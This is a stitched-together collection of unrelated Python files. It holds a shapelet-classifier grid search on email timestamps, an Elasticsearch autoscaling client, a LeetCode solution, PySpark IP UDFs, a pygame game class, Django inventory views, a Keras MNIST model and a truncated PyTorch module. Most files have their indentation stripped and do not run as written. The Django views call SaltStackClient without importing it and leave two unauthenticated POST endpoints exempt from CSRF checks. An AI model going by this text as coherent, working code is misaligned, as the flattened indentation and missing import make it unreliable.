    grid search over different filter bandwidth values with 5 fold cross validation. graph results
    width = 1 provides best accuracy, f1, support across classes
    '''
# shapelet classifier
#clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer)
acc = []
f1_macro = []
f1_weighted = []
for x in range(min, max, step):
# create rate values if they don't already exist
if os.path.isfile("rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}/series_values.npy".format(series_size / 60 / 60, num_bins, min_points, x, density)):
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, min_points, x, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
else:
labels_dict = {}
for val in index.unique():
if val < 50:
labels_dict[val] = 0
else:
labels_dict[val] = 1
series_values, _, labels, _ = \
batch_events_to_rates(event_times, index, labels_dict, series_size = series_size, min_points = min_points,
num_bins = num_bins, filter_bandwidth = x, density = density)
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
# randomly shuffle before splitting into training / test / val
np.random.seed(0)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
# train
train_split = int(0.9 * series_values.shape[0])
print("Evaluating filter bandwidth {}".format(x))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = num_bins, density=density,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
acc.append(np.mean(val_acc))
f1_macro.append(np.mean(val_f1_macro))
f1_weighted.append(np.mean(val_fl_weighted))
# graph results
names = ['Accuracy', 'F1 Macro', 'F1 Weighted']
for vals, name in zip([acc, f1_macro, f1_weighted], names):
plt.clf()
plt.plot(range(min, max, step), vals)
plt.title(name)
plt.xlabel('Filter Bandwidth')
plt.ylabel(name)
plt.show()
# return best result
x_vals = np.arange(min, max, step)
print("The best accuracy was {} at filter bandwidth {}".format(np.amax(acc), x_vals[np.argmax(acc)]))
print("The best f1 macro was {} at filter bandwidth {}".format(np.amax(f1_macro), x_vals[np.argmax(f1_macro)]))
print("The best f1 weighted was {} at filter bandwidth {}".format(np.amax(f1_weighted), x_vals[np.argmax(f1_weighted)]))
return np.amax(acc), np.amax(f1_macro), np.amax(f1_weighted)
def min_points_cv_grid_search(event_times, index, n_folds =5, min = 5, max = 26, step = 5, series_size = 30 * 60,
filter_bandwidth = 1, num_bins = 135, density = True, epochs=100, length=0.1, num_shapelet_lengths=2,
num_shapelets = .2, learning_rate=.01, weight_regularizer = .01):
    '''
    grid search over different minimum-points values with 5 fold cross validation. graph results
    min_points = 5 (10 might be a more faithful representation) provides best accuracy, f1, support across classes
    '''
# shapelet classifier
#clf = Shapelets(epochs, length, num_shapelet_lengths, num_shapelets, learning_rate, weight_regularizer)
acc = []
f1_macro = []
f1_weighted = []
for x in range(min, max, step):
# create rate values if they don't already exist
if os.path.isfile("rate_values/kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}/series_values.npy".format(series_size / 60 / 60, num_bins, x, filter_bandwidth, density)):
dir_path = "kmeans/sz_{}_hr_bins_{}_min_pts_{}_filter_width_{}_density_{}".format(series_size / 60 / 60, num_bins, x, filter_bandwidth, density)
series_values = np.load("rate_values/" + dir_path + "/series_values.npy")
labels = np.load("rate_values/" + dir_path + "/labels.npy")
else:
labels_dict = {}
for val in index.unique():
if val < 50:
labels_dict[val] = 0
else:
labels_dict[val] = 1
series_values, _, labels, _ = \
batch_events_to_rates(event_times, index, labels_dict, series_size = series_size, min_points = x,
num_bins = num_bins, filter_bandwidth = filter_bandwidth, density = density)
skf = StratifiedKFold(n_splits= n_folds, shuffle = True)
val_acc = []
val_f1_macro = []
val_fl_weighted = []
# randomly shuffle before splitting into training / test / val
np.random.seed(0)
randomize = np.arange(len(series_values))
np.random.shuffle(randomize)
series_values = series_values[randomize]
labels = labels[randomize]
# train
train_split = int(0.9 * series_values.shape[0])
print("Evaluating minimum number of points {}".format(x))
for i, (train, val) in enumerate(skf.split(series_values[:train_split], labels[:train_split])):
print("Running fold {} of {}".format(i+1, n_folds))
acc_val, f1_macro_val, f1_weighted_val = train_shapelets(series_values[train].reshape(-1, series_values.shape[1], 1), labels[train],
series_size = series_size, num_bins = num_bins, density=density,
val_data=(series_values[val].reshape(-1, series_values.shape[1], 1), labels[val]))
val_acc.append(acc_val)
val_f1_macro.append(f1_macro_val)
val_fl_weighted.append(f1_weighted_val)
acc.append(np.mean(val_acc))
f1_macro.append(np.mean(val_f1_macro))
f1_weighted.append(np.mean(val_fl_weighted))
# graph results
names = ['Accuracy', 'F1 Macro', 'F1 Weighted']
for vals, name in zip([acc, f1_macro, f1_weighted], names):
plt.clf()
plt.plot(range(min, max, step), vals)
plt.title(name)
plt.xlabel('Min Points')
plt.ylabel(name)
plt.show()
# return best result
x_vals = np.arange(min, max, step)
print("The best accuracy was {} at minimum number of points {}".format(np.amax(acc), x_vals[np.argmax(acc)]))
print("The best f1 macro was {} at minimum number of points {}".format(np.amax(f1_macro), x_vals[np.argmax(f1_macro)]))
print("The best f1 weighted was {} at minimum number of points {}".format(np.amax(f1_weighted), x_vals[np.argmax(f1_weighted)]))
return np.amax(acc), np.amax(f1_macro), np.amax(f1_weighted)
# main method for training methods
if __name__ == '__main__':
series_size = 240 * 60
num_bins = 300
min_points = 5
filter_bandwidth = 2
density = True
data = pd.read_pickle('../../all_emails_kmeans_clustered.pkl')
data = parse_weekly_timestamps(data)
# 5 fold CV on series size
'''
num_bins_cv_grid_search(data['Weekly Timestamp'], data['kmeans'], min = 300, max = 421, step = 30,
series_size=series_size, min_points=min_points, filter_bandwidth=filter_bandwidth, density=density)
shapelet_sizes_grid_search(series_size=series_size, filter_bandwidth=filter_bandwidth,
num_bins=num_bins, density=density, min_points=min_points)
'''
shapelets_hp_opt()
'''
# EDA events / series
labels_dict = {}
for val in data['file'].unique():
if val == 'enron.jsonl':
labels_dict[val] = 0
else:
labels_dict[val] = 1
batch_events_to_rates(data['Weekly Timestamp'], data['file'], labels_dict, series_size = series_size, min_points = min_points,
num_bins = num_bins, filter_bandwidth = filter_bandwidth, density = density)
'''
|
# Licensed to Elasticsearch B.V under one or more agreements.
# Elasticsearch B.V licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information
from .utils import NamespacedClient, query_params, SKIP_IN_PATH, _make_path
class AutoscalingClient(NamespacedClient):
@query_params()
async def get_autoscaling_decision(self, params=None, headers=None):
"""
Gets the current autoscaling decision based on the configured autoscaling
policy, indicating whether or not autoscaling is needed.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-get-autoscaling-decision.html>`_
"""
return await self.transport.perform_request(
"GET", "/_autoscaling/decision", params=params, headers=headers
)
@query_params()
async def delete_autoscaling_policy(self, name, params=None, headers=None):
"""
Deletes an autoscaling policy.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-delete-autoscaling-policy.html>`_
:arg name: the name of the autoscaling policy
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return await self.transport.perform_request(
"DELETE",
_make_path("_autoscaling", "policy", name),
params=params,
headers=headers,
)
@query_params()
async def put_autoscaling_policy(self, name, body, params=None, headers=None):
"""
Creates a new autoscaling policy.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-put-autoscaling-policy.html>`_
:arg name: the name of the autoscaling policy
:arg body: the specification of the autoscaling policy
"""
for param in (name, body):
if param in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument.")
return await self.transport.perform_request(
"PUT",
_make_path("_autoscaling", "policy", name),
params=params,
headers=headers,
body=body,
)
@query_params()
async def get_autoscaling_policy(self, name, params=None, headers=None):
"""
Retrieves an autoscaling policy.
`<https://www.elastic.co/guide/en/elasticsearch/reference/current/autoscaling-get-autoscaling-policy.html>`_
:arg name: the name of the autoscaling policy
"""
if name in SKIP_IN_PATH:
raise ValueError("Empty value passed for a required argument 'name'.")
return await self.transport.perform_request(
"GET",
_make_path("_autoscaling", "policy", name),
params=params,
headers=headers,
)
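# Hedged usage sketch (not part of the generated client). Assuming elasticsearch-py with
# async support (>= 7.8), this namespaced client is reachable as `es.autoscaling` on an
# AsyncElasticsearch instance; the policy body below is indicative only, see the linked
# Elasticsearch reference pages for the exact schema.
#
#   import asyncio
#   from elasticsearch import AsyncElasticsearch
#
#   async def demo():
#       es = AsyncElasticsearch("http://localhost:9200")
#       await es.autoscaling.put_autoscaling_policy("my_policy", body={"deciders": {}})
#       print(await es.autoscaling.get_autoscaling_policy("my_policy"))
#       await es.close()
#
#   asyncio.run(demo())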
|
# Given a non-empty array of digits representing a non-negative integer, add one to the integer.
#
# The most significant digit is stored at the head of the array, and each element stores a single digit.
#
# You may assume the integer does not contain any leading zeros, except the number 0 itself.
#
# Example 1:
#
# Input:  [1,2,3]
# Output: [1,2,4]
# Explanation: the input array represents the number 123.
#
#
# Example 2:
#
# Input:  [4,3,2,1]
# Output: [4,3,2,2]
# Explanation: the input array represents the number 4321.
#
# Related Topics: Array
from typing import List  # needed for the List[int] annotations below
# leetcode submit region begin(Prohibit modification and deletion)
class Solution:
def plusOne(self, digits: List[int]) -> List[int]:
num = int("".join([str(d) for d in digits])) + 1
return [int(d) for d in list(str(num))]
# leetcode submit region end(Prohibit modification and deletion)
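# Hedged alternative sketch (kept outside the submit region above): instead of round-tripping
# through int() and str(), propagate the carry in place. Illustration only; the typing import
# added at the top of this file covers the annotations.
def plus_one_carry(digits: List[int]) -> List[int]:
    result = digits[:]  # work on a copy so the caller's list is untouched
    for i in range(len(result) - 1, -1, -1):
        if result[i] < 9:
            result[i] += 1  # no carry needed, done
            return result
        result[i] = 0  # 9 + 1 rolls over to 0, the carry moves left
    return [1] + result  # every digit was 9, e.g. [9, 9] -> [1, 0, 0]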
|
from pyspark.sql.functions import udf
from pyspark.sql.types import ArrayType, StringType, BooleanType
from ctutil import iputil
import traceback
def regist_long2ip_udf(ss, logger):
    '''Convert an integer (long) IP value to its dotted string form.'''
def handle(iplong):
if not iplong:
return None
try:
if iplong == 0:
return None
return iputil.long2ip(iplong)
except:
logger.error(traceback.format_exc(), event="long2ip_udf")
return None
long2ip_udf = udf(lambda iplong: handle(iplong), StringType())
ss.udf.register("long2ip_udf", long2ip_udf)
return long2ip_udf
def regist_is_ipv4_udf(ss, logger):
    '''Check whether the given string is a valid IPv4 address.'''
is_ipv4_udf = udf(lambda ipstr: iputil.is_ipv4(ipstr), BooleanType())
ss.udf.register("is_ipv4_udf", is_ipv4_udf)
return is_ipv4_udf
def regist_is_ipv6_udf(ss, logger):
    '''Check whether the given string is a valid IPv6 address.'''
is_ipv6_udf = udf(lambda ipstr: iputil.is_ipv6(ipstr), BooleanType())
ss.udf.register("is_ipv6_udf", is_ipv6_udf)
return is_ipv6_udf
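# Hedged usage sketch (illustration only): how the registration helpers above are typically
# wired up. `spark` (a SparkSession) and `logger` are assumed to be provided by the
# surrounding application; 3232235777 is simply 192.168.1.1 as a long.
def example_usage(spark, logger):
    long2ip = regist_long2ip_udf(spark, logger)
    regist_is_ipv4_udf(spark, logger)
    df = spark.createDataFrame([(3232235777,)], ["ip_long"])
    df = df.withColumn("ip", long2ip(df["ip_long"]))
    df.createOrReplaceTempView("ips")
    spark.sql("SELECT ip, is_ipv4_udf(ip) AS is_v4 FROM ips").show()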
|
#!/usr/bin/env python
import os
import re
from functools import lru_cache
import pygame
from glm import vec3, sign
from random import randint
from game.scene import Scene
from game.base.inputs import Inputs, Axis, Button, JoyAxis, JoyButton, JoyAxisTrigger
from game.base.state import State
from game.constants import CAMERA_OFFSET, SCRIPTS_DIR, DEBUG
from game.entities.camera import Camera
from game.entities.player import Player
from game.entities.terminal import Terminal
from game.entities.powerup import Powerup
from game.base.enemy import Enemy
from game.entities.buttabomber import ButtaBomber
from game.entities.flyer import Flyer
from game.util import pg_color, ncolor
from game.base.signal import SlotList
from game.base.stats import Stats
class Game(State):
def __init__(self, app, state=None):
super().__init__(app, state)
self.scene = Scene(self.app, self)
self.gui = Scene(self.app, self)
self.slots = SlotList()
self.paused = False
# self.scene.add(ButtaBomber(app, self.scene, vec3(0, 0, -3000)))
# self.scene.add(Powerup(app, self.scene, 'star', position=vec3(0, 0, -3000)))
# create terminal first since player init() writes to it
self.terminal = self.gui.add(Terminal(self.app, self.scene))
self.app.inputs = self.build_inputs()
self.camera = self.scene.add(Camera(app, self.scene, self.app.size))
stats = self.stats = self.app.data["stats"] = self.app.data.get(
"stats", Stats()
)
self.level = stats.level
self.player = self.scene.add(Player(app, self.scene, level=self.level))
# self.scripts += self.score_screen
# self.camera.slots.append(
# self.player.on_move.connect(lambda: self.camera.update_pos(self.player))
# )
self.debug = False
self.slots += [
app.inputs["debug"].on_press(lambda _: self.debug_mode(True)),
app.inputs["debug"].on_release(lambda _: self.debug_mode(False)),
]
self.slots += [
app.inputs["pause"].on_press(self.toggle_pause),
]
self.time = 0
# score backdrop
backdrop_h = int(24 * 1.8)
# draw a score backdrop
rows = 8
for i in range(rows):
h = int(backdrop_h) // rows
y = h * i
backdrop = pygame.Surface((self.app.size.x, h))
interp = i / rows
interp_inv = 1 - i / rows
backdrop.set_alpha(255 * interp * 0.4)
# backdrop.fill((0))
backdrop.fill(pg_color(ncolor("white") * interp_inv))
self.scene.on_render += lambda _, y=y, backdrop=backdrop: self.app.screen.blit(
backdrop, (0, y)
)
# backdrop = pygame.Surface((self.app.size.x, h))
# backdrop.set_alpha(255 * interp)
# backdrop.fill((0))
# backdrop_h = int(24)
# rows = 4
# for i in range(rows, 0, -1):
# h = (int(backdrop_h) // rows)
# y = h * i
# backdrop = pygame.Surface((self.app.size.x, h))
# interp = i/rows
# interp_inv = 1 - i/rows
# backdrop.set_alpha(200 * interp_inv)
# backdrop.fill((0))
# # backdrop.fill(pg_color(ncolor('black')*interp_inv))
# self.scene.on_render += lambda _, y=y,backdrop=backdrop: self.app.screen.blit(backdrop, (0,self.app.size.y-y))
# self.scene.on_render += lambda _: self.app.screen.blit(self.backdrop, (0,int(self.app.size.y-backdrop_h)))
# self.scripts += self.score_screen
def toggle_pause(self, *args):
if not self.player or not self.player.alive:
self.app.state = "game"
return
self.paused = not self.paused
if self.paused:
self.terminal.write_center(
"- GAME PAUSED -", 10,
)
# self.scene.play_sound('pause.wav')
else:
self.terminal.clear(10)
# self.scene.play_sound('pause.wav')
@staticmethod
@lru_cache(maxsize=1)
def level_count():
        level_regex = re.compile(r"level(\d+)\.py")
count = 0
for path in os.listdir(SCRIPTS_DIR):
if re.match(level_regex, path):
count += 1
return count + 1
@property
def level(self):
return self._level
@level.setter
def level(self, value):
self._level = value % self.level_count()
self.scene.script = f"level{self.level}"
def debug_mode(self, b):
self.debug = b
for i in range(9):
self.terminal.clear(13 + i)
if not b:
self.player.write_weapon_stats()
def pend(self):
# self.dirty = True
self.app.pend() # tell app we need to update
def update(self, dt):
"""
Called every frame by App as long as Game is the current app.state
:param dt: time since last frame in seconds
"""
if self.paused:
return
super().update(dt) # needed for state script (unused)
if self.scene.script and self.scene.script.done():
self.app.state = "intermission"
return
self.scene.update(dt)
self.gui.update(dt)
# Update the camera according to the player position
# And movement
self.camera.position = self.player.position + CAMERA_OFFSET
self.camera.up = vec3(0, 1, 0)
d = self.player.velocity.x / self.player.speed.x
if d:
self.camera.rotate_around_direction(-d * 0.05)
self.time += dt
assert self.scene.blocked == 0
def render(self):
"""
Clears screen and draws our scene to the screen
Called every frame by App as long as Game is the current app.state
"""
# Render Player's Position
# pos_display = "Position: {}".format(self.player.position)
# pos_pos = (self.terminal.size.x - len(pos_display), 0)
# self.terminal.write(pos_display, pos_pos)
# self.debug = True
if self.debug:
self.terminal.write(
"Sc/when: " + str(len(self.scene.script.when)) + " ", 14
)
self.terminal.write("S/when: " + str(len(self.scene.when)) + " ", 15)
self.terminal.write("SL: " + str(len(self.scene.slotlist)) + " ", 16)
self.terminal.write("Res: " + str(len(self.app.cache)) + " ", 17)
self.terminal.write(f"FPS low: {self.scene.lowest_fps} ", 18)
self.terminal.write(f"Pmax: {self.scene.max_particles} ", 19)
self.terminal.write(f"Entities: {len(self.scene.slots)} ", 20)
self.terminal.write(f"FPS: {self.app.fps} ", 21)
self.scene.render(self.camera)
self.gui.render(self.camera)
assert self.scene.blocked == 0
def build_inputs(self):
pg = pygame
pg.joystick.quit() # Reload
pg.joystick.init()
for j in range(pg.joystick.get_count()):
j = pg.joystick.Joystick(j)
j.init()
inputs = Inputs()
inputs["hmove"] = Axis(
(pg.K_LEFT, pg.K_a), (pg.K_RIGHT, pg.K_d), JoyAxis(0, 0), smooth=0.1
)
inputs["vmove"] = Axis(
(pg.K_DOWN, pg.K_s), (pg.K_UP, pg.K_w), JoyAxis(0, 1, True),
)
inputs["fire"] = Button(
pg.K_SPACE,
pg.K_RETURN,
JoyButton(0, 1),
JoyButton(0, 0),
JoyAxisTrigger(0, 2, 0),
JoyAxisTrigger(0, 5, 0),
)
inputs["debug"] = Button(pg.K_TAB)
inputs["switch-gun"] = Button(
pg.K_RSHIFT, pg.K_LSHIFT, JoyButton(0, 3), JoyButton(0, 2)
)
# inputs["test"] = Button(pg.K_p)
inputs["pause"] = Button(pg.K_ESCAPE, JoyButton(0, 6), JoyButton(0, 7))
return inputs
def restart(self):
"""
Called by player when() event after death
"""
# clear terminal
self.scene.clear_type(Enemy)
self.scene.clear_type(Powerup)
        for x in range(2, 20):
            self.terminal.clear(x)
self.level = self._level # retriggers
|
# -*- coding: utf-8 -*-
import json
from collections import OrderedDict
import six
from functools import update_wrapper
from django.contrib import messages
from django.conf import settings
from django.urls import reverse, reverse_lazy
from django.http import HttpResponse, JsonResponse, HttpResponseRedirect
from django.views import View
from django.views.generic.base import TemplateView
from django.views.generic.edit import FormView
from django.views.generic.base import RedirectView
from django.views.decorators.csrf import csrf_exempt
from django.utils.decorators import method_decorator, classonlymethod
from django.contrib.auth.mixins import LoginRequiredMixin
from django import forms
from django.forms import formsets
from formtools.wizard.views import SessionWizardView, NoFileStorageConfigured
from architect.views import JSONDataView
from .models import Inventory, Resource
from .forms import InventoryDeleteForm, \
ResourceDeleteForm, ResourceCreateForm
from .tasks import get_inventory_status_task, \
sync_inventory_resources_task
class InventoryListView(LoginRequiredMixin, TemplateView):
template_name = "inventory/inventory_list.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['inventory_list'] = Inventory.objects.order_by('name')
return context
class InventoryCheckView(LoginRequiredMixin, RedirectView):
permanent = False
query_string = True
pattern_name = 'inventory:inventory_list'
def get_redirect_url(self, *args, **kwargs):
inventories = Inventory.objects.all()
for inventory in inventories:
get_inventory_status_task.apply_async((inventory.name,))
messages.add_message(self.request,
messages.SUCCESS,
'Finished syncing of inventories.')
return super().get_redirect_url(*args, **kwargs)
class InventorySyncView(LoginRequiredMixin, RedirectView):
permanent = False
pattern_name = 'inventory:inventory_detail'
def get_redirect_url(self, *args, **kwargs):
sync_inventory_resources_task.apply_async(
(kwargs.get('inventory_name'),))
return super().get_redirect_url(*args, **kwargs)
class InventoryDetailView(LoginRequiredMixin, TemplateView):
template_name = "inventory/inventory_detail.html"
def get_context_data(self, **kwargs):
inventory = Inventory.objects.get(name=kwargs.get('inventory_name'))
context = super().get_context_data(**kwargs)
context['inventory'] = inventory
if inventory.engine == 'hier-cluster':
context['service_formula_list'] = Resource.objects.filter(
inventory=inventory,
kind='service_formula')
context['service_class_list'] = Resource.objects.filter(
inventory=inventory,
kind='service_class')
context['system_unit_list'] = Resource.objects.filter(
inventory=inventory,
kind='system_unit')
context['system_class_list'] = Resource.objects.filter(
inventory=inventory,
kind='system_class')
context['cluster_class_list'] = Resource.objects.filter(
inventory=inventory,
kind='cluster_class')
context['cluster_unit_list'] = Resource.objects.filter(
inventory=inventory,
kind='cluster_unit')
return context
class InventoryDetailJSONView(JSONDataView):
def get_context_data(self, **kwargs):
inventory = Inventory.objects.get(name=kwargs.get('inventory_name'))
return inventory.inventory()
class InventoryDeleteView(LoginRequiredMixin, FormView):
template_name = "base_form.html"
form_class = InventoryDeleteForm
success_url = '/inventory/v1/success'
def get_success_url(self):
return reverse('inventory:inventory_list')
def get_form_kwargs(self):
inventory_name = self.kwargs.get('inventory_name')
kwargs = super(InventoryDeleteView, self).get_form_kwargs()
kwargs.update({'initial': {'inventory_name': inventory_name}})
return kwargs
def form_valid(self, form):
form.handle()
return super().form_valid(form)
class ResourceDetailView(LoginRequiredMixin, TemplateView):
template_name = "inventory/resource_detail.html"
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
inventory = Inventory.objects.get(name=kwargs.get('inventory_name'))
context['inventory'] = inventory
context['resource_name'] = kwargs.get('resource_name')
resource_list = inventory.class_list()
context['class_list'] = resource_list[context['resource_name']]
return context
class ResourceDetailJSONView(JSONDataView):
def get_context_data(self, **kwargs):
inventory = Inventory.objects.get(name=kwargs.get('inventory_name'))
# context = super().get_context_data(**kwargs)
return inventory.inventory(kwargs.get('resource_name'))
class ResourceCreateView(View):
@method_decorator(csrf_exempt)
def dispatch(self, request, *args, **kwargs):
return super(ResourceCreateView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponse('Only POST method is supported.')
def post(self, request, *args, **kwargs):
metadata = json.loads(request.body.decode("utf-8"))
manager_kwargs = {
'name': kwargs.get('master_id'),
'engine': 'saltstack',
}
update_client = SaltStackClient(**manager_kwargs)
metadata['manager'] = kwargs.get('master_id')
update_client.process_resource_metadata('salt_event', metadata)
cache_client = SaltStackClient(**manager_kwargs)
cache_client.refresh_cache()
return HttpResponse('OK')
class ResourceDeleteView(LoginRequiredMixin, FormView):
template_name = "base_form.html"
form_class = ResourceDeleteForm
success_url = '/inventory/v1/success'
def get_success_url(self):
return reverse('inventory:inventory_list')
def get_form_kwargs(self):
inventory_name = self.kwargs.get('inventory_name')
resource_name = self.kwargs.get('resource_name')
kwargs = super(ResourceDeleteView, self).get_form_kwargs()
kwargs.update({'initial': {
'inventory_name': inventory_name,
'resource_name': resource_name
}})
return kwargs
def form_valid(self, form):
form.handle()
return super().form_valid(form)
class ResourceClassifyView(View):
@method_decorator(csrf_exempt)
def dispatch(self, request, *args, **kwargs):
return super(ResourceClassifyView, self).dispatch(request, *args, **kwargs)
def get(self, request, *args, **kwargs):
return HttpResponse('Only POST method is supported.')
def post(self, request, *args, **kwargs):
metadata = json.loads(request.body.decode("utf-8"))
manager_kwargs = {
'name': kwargs.get('master_id'),
'engine': 'saltstack',
}
return HttpResponse('OK')
class ClassGenerateView(LoginRequiredMixin, FormView):
template_name = "base_form.html"
form_class = ResourceCreateForm
def get_success_url(self):
return reverse('inventory:inventory_list')
def get_form_kwargs(self):
inventory_name = self.kwargs.get('inventory_name')
form_name = self.kwargs.get('form_name')
inventory = Inventory.objects.get(name=inventory_name)
form_meta = inventory.metadata['form'][form_name]['steps'][0]
kwargs = super(ClassGenerateView, self).get_form_kwargs()
kwargs.update({
'inventory': inventory,
'form_name': form_name,
'form_meta': inventory.metadata['form'][form_name],
'params': form_meta['fields']
})
return kwargs
def form_valid(self, form):
form.handle()
return super().form_valid(form)
class InventorySessionWizardView(SessionWizardView):
@classmethod
def get_initkwargs(cls, form_list=[], initial_dict=None, instance_dict=None,
condition_dict=None, *args, **kwargs):
kwargs.update({
'form_list': form_list,
'initial_dict': (
initial_dict or
kwargs.pop('initial_dict', getattr(cls, 'initial_dict', None)) or {}
),
'instance_dict': (
instance_dict or
kwargs.pop('instance_dict', getattr(cls, 'instance_dict', None)) or {}
),
'condition_dict': (
condition_dict or
kwargs.pop('condition_dict', getattr(cls, 'condition_dict', None)) or {}
)
})
return kwargs
def set_form_list(self, request, *args, **kwargs):
"""
Creates computed_form_list from the original form_list.
Separated from the original `set_initkwargs` method.
"""
# this will be created with some other magic later, now just hardcoded POC
inventory_name = self.kwargs.get('inventory_name')
form_name = self.kwargs.get('form_name')
inventory = Inventory.objects.get(name=inventory_name)
form_meta = inventory.metadata['form'][form_name]['steps'][0]
print(kwargs)
form_list = []
# form_list = [('contact_form_1', ContactForm1), ('contact_form_2', ContactForm2)]
computed_form_list = OrderedDict()
# walk through the passed form list
for i, form in enumerate(form_list):
if isinstance(form, (list, tuple)):
# if the element is a tuple, add the tuple to the new created
# sorted dictionary.
computed_form_list[six.text_type(form[0])] = form[1]
else:
# if not, add the form with a zero based counter as unicode
computed_form_list[six.text_type(i)] = form
# walk through the new created list of forms
for form in six.itervalues(computed_form_list):
if issubclass(form, formsets.BaseFormSet):
# if the element is based on BaseFormSet (FormSet/ModelFormSet)
# we need to override the form variable.
form = form.form
# check if any form contains a FileField, if yes, we need a
# file_storage added to the wizardview (by subclassing).
for field in six.itervalues(form.base_fields):
if (isinstance(field, forms.FileField) and
                        not hasattr(self, 'file_storage')):
raise NoFileStorageConfigured(
"You need to define 'file_storage' in your "
"wizard view in order to handle file uploads."
)
self.form_list = computed_form_list
def dispatch(self, request, *args, **kwargs):
"""
This method gets called by the routing engine. The first argument is
`request` which contains a `HttpRequest` instance.
The request is stored in `self.request` for later use. The storage
instance is stored in `self.storage`.
After processing the request using the `dispatch` method, the
response gets updated by the storage engine (for example add cookies).
Override: construct `form_list` here and save it on view instance
"""
self.set_form_list(request, *args, **kwargs)
        return super(InventorySessionWizardView, self).dispatch(request, *args, **kwargs)
class ClassGenerateWizardView(InventorySessionWizardView):
template_name = 'inventory/model_generate.html'
def get_context_data(self, form, **kwargs):
context = super(ClassGenerateWizardView, self).get_context_data(form=form, **kwargs)
inventory_name = self.kwargs.get('inventory_name')
form_name = self.kwargs.get('form_name')
inventory = Inventory.objects.get(name=inventory_name)
form_meta = inventory.metadata['form'][form_name]
context.update({
'inventory': inventory,
'form_meta': form_meta
})
return context
def done(self, form_list, **kwargs):
return "" # HttpResponseRedirect(reverse_lazy('inventory:inventory_detail', kwargs['inventory_name']))
|
# -*- coding: utf-8 -*-
"""
Created on Tue Jun 16 17:41:12 2020
@author: logun
"""
import matplotlib.pyplot as plt
from keras.datasets import mnist
from keras.models import Sequential
from keras.layers import Dense, Flatten, Dropout, Conv2D, MaxPooling2D
import tensorflow as tf
import numpy as np
import wandb
from wandb.keras import WandbCallback
# logging code
run = wandb.init(project="cnn_test")
config = run.config
# load data
(X_train, y_train), (X_test, y_test) = mnist.load_data()
one = np.array(X_test[2], dtype='float')
one = one.reshape((28, 28))
two = np.array(X_test[1], dtype='float')
two = two.reshape((28, 28))
seven = np.array(X_test[0], dtype='float')
seven = seven.reshape((28, 28))
## reshape all images to width = 28, height = 28,
# and add an extra dimension for the colour channel
X_train = X_train.reshape(X_train.shape[0], 28, 28, 1)
X_test = X_test.reshape(X_test.shape[0], 28, 28, 1)
input_shape = (28,28,1)
X_train = X_train.astype("float32")
X_test = X_test.astype("float32")
labels = range(10)
X_train /= 255
X_test /= 255
model = Sequential()
##
model.add(Conv2D(28, kernel_size=(3,3), input_shape = input_shape, activation="relu"))
#model.add(Conv2D(32,
# (config.first_layer_conv_width, config.first_layer_conv_height),
# input_shape=input_shape,
# activation='relu'))
##Pooling: Shrinks Image
model.add(MaxPooling2D(pool_size = (3,3)))
model.add(Flatten())
model.add(Dense(128, activation =tf.nn.relu))
model.add(Dropout(0.2))
#10 is number of outputs
model.add(Dense(10, activation = tf.nn.softmax))
# sparse_categorical_crossentropy accepts integer class labels directly (no one-hot encoding needed)
model.compile(loss='sparse_categorical_crossentropy', optimizer='adam',
metrics=['accuracy'])
# Fit the model
model.fit(X_train, y_train, epochs=10, validation_data=(X_test, y_test),
callbacks=[WandbCallback(labels=labels, data_type="image")])
image_index = 4444
plt.imshow(X_test[image_index].reshape(28, 28),cmap = plt.get_cmap("gray"))
pred = model.predict(X_test[image_index].reshape(1, 28, 28 , 1))
print(pred.argmax())
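# Hedged follow-up sketch: report held-out performance after training. With the compile()
# call above, model.evaluate returns [loss, accuracy] for the test set.
test_loss, test_acc = model.evaluate(X_test, y_test, verbose=0)
print("test loss: {:.4f}, test accuracy: {:.4f}".format(test_loss, test_acc))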
|
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from torchvision import models
def weights_init(init_type='gaussian'):
def init_fun(m):
classname = m.__class__.__name__
if (classname.find('Conv') == 0 or classname.find(
'Linear') == 0) and hasattr(m, 'weight'):
if init_type == 'gaussian':
nn.init.normal_(m.weight, 0.0, 0.02)
elif init_type == 'xavier':
nn.init.xavier_normal_(m.weight, gain=math.sqrt(2))
elif init_type == 'kaiming':
nn.init.kaiming_normal_(m.weight, a=0, mode='fan_in')
elif init_type == 'orthogonal':
nn.init.orthogonal_(m.weight, gain=math.sqrt(2))
elif init_type == 'default':
pass
else:
assert 0, "Unsupported initialization: {}".format(init_type)
if hasattr(m, 'bias') and m.bias is not None:
nn.init.constant_(m.bias, 0.0)
return init_fun
class RGBConv(nn.Module):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, groups=1, bias=True):
super().__init__()
self.input_conv = nn.Conv2d(in_channels, out_channels, kernel_size,
stride, padding, dilation, groups, bias)
self.input_conv.apply(weights_init('kaiming'))
def forward(self, input):
return self.input_conv(input)
class RGBActiv(nn.Module):
def __init__(self, in_ch, out_ch, bn=True, sample='none-3', activ='relu',
conv_bias=False):
super().__init__()
if sample == 'down-5':
